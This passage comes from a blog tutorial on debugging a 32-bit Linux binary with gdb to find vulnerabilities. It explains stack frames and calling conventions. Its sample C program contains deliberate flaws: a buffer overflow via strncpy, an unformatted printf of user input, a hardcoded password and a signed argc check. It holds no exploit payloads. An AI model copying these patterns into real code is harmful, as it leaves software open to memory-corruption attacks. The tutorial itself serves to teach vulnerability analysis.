class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot; lt;passwordgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis time we will not exploit this application (we've done that already), instead we'll just use the debugger it figure out that these vulnerabilities exist./p h2Setting Up The Environment/h2 pThis is the same as in part a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a and a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a so please refer to the strongSetting Up The Environment/strong section of 1 of those./p h2Looking For The Juicy Bits/h2 pFirst we'll test the application as usual:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app/span span class="code-line"span class="go"Usage: ./app lt;passwordgt;/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="nb"test/span/span span class="code-line"span class="go"Wrong password: test/span/span span class="code-line"span class="gp"[email protected]:~$ echo $/span?/span span class="code-line"span class="go"1/span/span span class="code-line"/code/pre/div /td/tr/table pNothing unusual there but we now know that the application takes 1 argument. If we open this using codegdb/code we can have a closer look at it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangdb -q ./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"info functions/span/span span class="code-line"span class="go"All defined functions:/span/span span class="code-line"/span span class="code-line"span class="go"Non-debugging symbols:/span/span span class="code-line"span class="go"0x0804842e _init/span/span span class="code-line"span class="go"0x08048460 strcmp/span/span span class="code-line"span class="go"0x08048460 [email protected]/span/span span class="code-line"span class="go"0x08048470 printf/span/span span class="code-line"span class="go"0x08048470 [email protected]/span/span span class="code-line"span class="go"0x08048480 fclose/span/span span class="code-line"span class="go"0x08048480 [email protected]/span/span span class="code-line"span class="go"0x08048490 _IO_getc/span/span span class="code-line"span class="go"0x08048490 [email protected]/span/span span class="code-line"span class="go"0x080484a0 puts/span/span span class="code-line"span class="go"0x080484a0 [email protected]/span/span span class="code-line"span class="go"0x080484b0 __gmon_start__/span/span span class="code-line"span class="go"0x080484b0 [email protected]/span/span span class="code-line"span class="go"0x080484c0 exit/span/span span class="code-line"span class="go"0x080484c0 [email protected]/span/span span class="code-line"span class="go"0x080484d0 strlen/span/span span class="code-line"span class="go"0x080484d0 [email protected]/span/span span class="code-line"span class="go"0x080484e0 __libc_start_main/span/span span class="code-line"span class="go"0x080484e0 [email protected]/span/span span class="code-line"span class="go"0x080484f0 fopen/span/span span class="code-line"span class="go"0x080484f0 [email protected]/span/span span class="code-line"span class="go"0x08048500 putchar/span/span span class="code-line"span class="go"0x08048500 [email protected]/span/span span class="code-line"span class="go"0x08048510 strncpy/span/span span class="code-line"span class="go"0x08048510 [email protected]/span/span span class="code-line"span class="go"0x08048520 _start/span/span span class="code-line"span class="go"0x08048550 deregister_tm_clones/span/span span class="code-line"span class="go"0x08048580 register_tm_clones/span/span span class="code-line"span class="go"0x080485c0 __do_global_dtors_aux/span/span span class="code-line"span class="go"0x080485e0 frame_dummy/span/span span class="code-line"span class="go"0x0804860c main/span/span span class="code-line"span class="go"0x080486a2 checkpass/span/span span class="code-line"span class="go"0x080486f0 printfile/span/span span class="code-line"span class="go"0x08048760 __libc_csu_fini/span/span span class="code-line"span class="go"0x08048770 __libc_csu_init/span/span span class="code-line"span class="go"0x080487ca __i686.get_pc_thunk.bx/span/span span class="code-line"span class="go"0x080487d0 _fini/span/span span class="code-line"/code/pre/div /td/tr/table pHere we can tell that the application was written in a href="https://en.wikipedia.org/wiki/C_%28programming_language%29" target="_blank"C/a because it includes code__libc_start_main/code on lines 25 and 26. This means we have a codemain/code function which is the start of our application (shown on line 38)./p pThere are a couple of other functions of interest here but let's leave them for a bit and look at the codemain/code function:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go" 0x0804860c lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804860d lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x0804860f lt;+3gt;: and esp,0xfffffff0/span/span span class="code-line"span class="go" 0x08048612 lt;+6gt;: sub esp,0x20/span/span span class="code-line"span class="go" 0x08048615 lt;+9gt;: cmp DWORD PTR [ebp+0x8],0x1/span/span span class="code-line"span class="go" 0x08048619 lt;+13gt;: jg 0x804864c lt;main+64gt;/span/span span class="code-line"span class="go" 0x0804861b lt;+15gt;: mov DWORD PTR [esp],0x80487f0/span/span span class="code-line"span class="go" 0x08048622 lt;+22gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804862f lt;+35gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048634 lt;+40gt;: mov DWORD PTR [esp],0x80487f8/span/span span class="code-line"span class="go" 0x0804863b lt;+47gt;: call 0x80484a0 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048640 lt;+52gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048647 lt;+59gt;: call 0x80484c0 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804864c lt;+64gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804864f lt;+67gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048652 lt;+70gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x08048654 lt;+72gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048657 lt;+75gt;: call 0x80486a2 lt;checkpassgt;/span/span span class="code-line"span class="go" 0x0804865c lt;+80gt;: mov DWORD PTR [esp+0x1c],eax/span/span span class="code-line"span class="go" 0x08048660 lt;+84gt;: cmp DWORD PTR [esp+0x1c],0x0/span/span span class="code-line"span class="go" 0x08048665 lt;+89gt;: je 0x804869b lt;main+143gt;/span/span span class="code-line"span class="go" 0x08048667 lt;+91gt;: mov DWORD PTR [esp],0x8048804/span/span span class="code-line"span class="go" 0x0804866e lt;+98gt;: call 0x8048470 lt;pri[email protected];/span/span span class="code-line"span class="go" 0x08048673 lt;+103gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x08048676 lt;+106gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048679 lt;+109gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804867b lt;+111gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804867e lt;+114gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048683 lt;+119gt;: mov DWORD PTR [esp],0xa/span/span span class="code-line"span class="go" 0x0804868a lt;+126gt;: call 0x8048500 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804868f lt;+131gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048696 lt;+138gt;: call 0x80484c0 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804869b lt;+143gt;: call 0x80486f0 lt;printfilegt;/span/span span class="code-line"span class="go" 0x080486a0 lt;+148gt;: leave /span/span span class="code-line"span class="go" 0x080486a1 lt;+149gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pThe first 4 instructions are the a href="https://en.wikipedia.org/wiki/Function_prologue" target="_blank"function prologue/a (lines 3, 4, 5 and 6). Here the a href="http://en.citizendium.org/wiki/Stack_frame" target="_blank"stack frame/a is set up./p pThe last 2 instructions are the a href="https://en.wikipedia.org/wiki/Function_prologue#Epilogue" target="_blank"function epilogue/a (lines 39 and 40). Here the codeleave/code instruction preforms the inverse of what the prologue did./p pLooking at the prologue and epilogue we can see that the a href="https://en.wikipedia.org/wiki/Calling_convention" target="_blank"calling convention/a is probably a href="https://en.wikipedia.org/wiki/X86_calling_conventions#cdecl" target="_blank"cdecl/a./p pI will not go into calling conventions much here, because it isn't terribly relevant although its important to know what they are and the differences, but a calling convention basically defines how a function is called./p pBack on topic, initially when looking for a vulnerability we should check some of the known vulnerable functions commonly used by developers. The main 1's are the codeprintf/code family of functions and the string copying/moving functions./p pLooking back at our list of functions, a couple of interest are being used. Mainly codeprintf/code and codestrncpy/code. In the main function though only codeprintf/code out of those 2 is being used. Let's examine them a little closer./p pThe first, on line 10, is set up on line 9 with an argument:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go" 0x0804861b lt;+15gt;: mov DWORD PTR [esp],0x80487f0/span/span span class="code-line"span class="go" 0x08048622 lt;+22gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"/code/pre/div /td/tr/table pWhat the first instruction is doing here is moving the address code0x80487f0/code into the address strongpointed to/strong by the a href="http://www.c-jump.com/CIS77/ASM/Stack/S77_0040_esp_register.htm" target="_blank"ESP register/a. These 2 lines relate to line 17 in our source code above./p pThe ESP register points to the top of the a href="https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29" target="_blank"stack/a and in the cdecl calling convension, before the actual call to the function, its arguments are strongpushed/strong onto the stack in reverse order. As there is only 1 argument to this call only 1 is put on the stack./p pTo be honest, this call doesn't look like its going to be of interest as the argument is a static address and it points to the a href="https://en.wikipedia.org/wiki/Code_segment" target="_blank"text segment/a of memory which isn't writable, but we can check the value of this just to make sure:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x80487f0/span/span span class="code-line"span class="go"0x80487f0: quot;Usage: quot;/span/span span class="code-line"/code/pre/div /td/tr/table pSo it looks to be part of an error message. The next call to codeprintf/code looks more interesting but first we need to understand how a stack frame is arranged in an application like this./p h2Stack Frames/h2 pBelow is the top of an example stack frame which is getting ready for a function call:/p pimg src="/assets/images/x86-32-linux/stack1.jpg" width="300"/p pHere we are unable to see the base pointer (EBP) but we can see the stack pointer (ESP) which always points to the top of the stack./p pPutting arguments on the stack can be done in a number of ways. Firstly it can be done using the codepush/code instruction as follows:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nf"push/span span class="nb"eax/span/span span class="code-line"span class="nf"push/span span class="mh"0x80487f0/span/span span class="code-line"span class="nf"push/span span class="p"[/spanspan class="nb"ebp/spanspan class="o"+/spanspan class="nv"c/spanspan class="p"]/span/span span class="code-line"/code/pre/div /td/tr/table pHere the value is the EAX register is being strongpushed/strong onto the stack as the third argument (or "ARG 3" in our diagram), then the static value code0x80487f0/code as the second argument and finally EBP+c (or EBP+12, which is usually the second argument to the current function) as the first argument./p pThe codepush/code instruction automatically adjusts the value of ESP accordingly but it can also be done manually:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nf"sub/span span class="nb"esp/spanspan class="p",/span span class="mh"0xc/span/span span class="code-line"span class="nf"mov/span span class="p"[/spanspan class="nb"esp/spanspan class="o"+/spanspan class="mi"8/spanspan class="p"],/span span class="nb"eax/span/span span class="code-line"span class="nf"mov/span span class="p"[/spanspan class="nb"esp/spanspan class="o"+/spanspan class="mi"4/spanspan class="p"],/span span class="mh"0x80487f0/span/span span class="code-line"span class="nf"mov/span span class="p"[/spanspan class="nb"esp/spanspan class="p"],/span span class="p"[/spanspan class="nb"ebp/spanspan class="o"+/spanspan class="nv"c/spanspan class="p"]/span/span span class="code-line"/code/pre/div /td/tr/table pThis set of instructions are functionally the same as the previous. These are followed by a codecall/code instruction and after the call instruction our stack looks like this:/p pimg src="/assets/images/x86-32-linux/stack2.jpg" width="300"/p pThe codecall/code instruction autmatically strongpushes/strong the memory address of the next instruction onto the stack. This is done so that when a function returns the application knows where to start executing instructions./p pInside the function that we have just called we start executing that functions prologue. First there is a codepush ebp/code instruction which does this to the stack:/p pimg src="/assets/images/x86-32-linux/stack3.jpg" width="300"/p pAfter that it executes codemov ebp, esp/code:/p pimg src="/assets/images/x86-32-linux/stack4.jpg" width="300"/p pLastly any space for needed for local variables is subtracted from ESP (codesub esp, 0x8/code), so our stack ends up like this:/p pimg src="/assets/images/x86-32-linux/stack5.jpg" width="300"/p pEBP always points to the start of the current functions stack frame and ESP to the top of the stack so if we call another function inside the current function the same process would happen./p pThe functions epilogue does the opposite, in the application we are debugging it just have to codeleave/code instruction. The codeleave/code instruction automates the cleanup of the stack frame./p pIn our example stack, the codeleave/code function would be equivalent to:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nf"add/span span class="nb"esp/spanspan class="p",/span span class="mh"0x8/span/span span class="code-line"span class="nf"pop/span span class="nb"ebp/span/span span class="code-line"/code/pre/div /td/tr/table pThis would bring our stack frame back to this:/p pimg src="/assets/images/x86-32-linux/stack2.jpg" width="300"/p pAnd then the final coderet/code instruction would remove the strongRET ADDR/strong from the stack setting everything back to how it was before the function call, coderet/code essentially does codepop eip/code./p h2Juicy Bits Continued/h2 pNow that we understand how the stack works we can have a look at that second call to codeprintf/code. The first argument to codeprintf/code is always the format string so when looking for a format string vulnerability we are trying to figure out if we can control the first argument./p pThe relevant lines that setup and call codeprintf/code are:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x0804862f lt;+35gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"/code/pre/div /td/tr/table pThese 4 lines of code is actually line 18 in the source of the application. Line 1 moves the second argument (codeebp+0xc/code) (the second argument is always +C or +12 because EBP points to the old EBP, +4 points to the return address and +8 points to the first argument) into EAX./p pIn C the second argument to the main function is a list of pointers to the actual application arguments./p pBecause this argument is an array of pointers, line 2 moves the first pointer in this array into EAX (this normally points to the path of the application itself)./p pThis pointer is moved to the address pointed to by ESP (the top of the stack) and finally codeprintf/code is called. This shows that only 1 argument was given and that argument is the application path./p pWe can check this using codegdb/code but first there was a conditional statement which determined if this code got executed:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048615 lt;+9gt;: cmp DWORD PTR [ebp+0x8],0x1/span/span span class="code-line"span class="x" 0x08048619 lt;+13gt;: jg 0x804864c lt;main+64gt;/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the codeif/code statement on line 16 of the source code./p pLine 1 compares the first argument codeebp+0x8/code, with 1 and jumps to code0x804864c/code if the first argument is greater than 1. As you can see the assembly condition is the opposite to what is in the source code, this is often the case./p pIn C the first argument to the main function is the number of arguments give to the application on the command line so to enter the section of code we want to analyse we just need to give the application 1 argument (the name of the application is considered the first argument so there is always at least 1)./p h3Integer Overflow/h3 pThe codejg/code instruction means that the numbers that are being compared are signed (it would be codeja/code if they were unsigned) and because there is no bound checking done on codeebp+0x8/code, it is vulnerable to an integer overflow:/p pI wanted to demostrate this as soon as I realised but because it is an integer I need to send at least 2147483647 arguments, I couldn't do this on my test machine because there just isn't enough RAM./p pSo in the name of science, I rewrote the application so that the codeargc/code argument (or the number of arguments passed to the main function) is a codechar/code instead, here is my new application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span 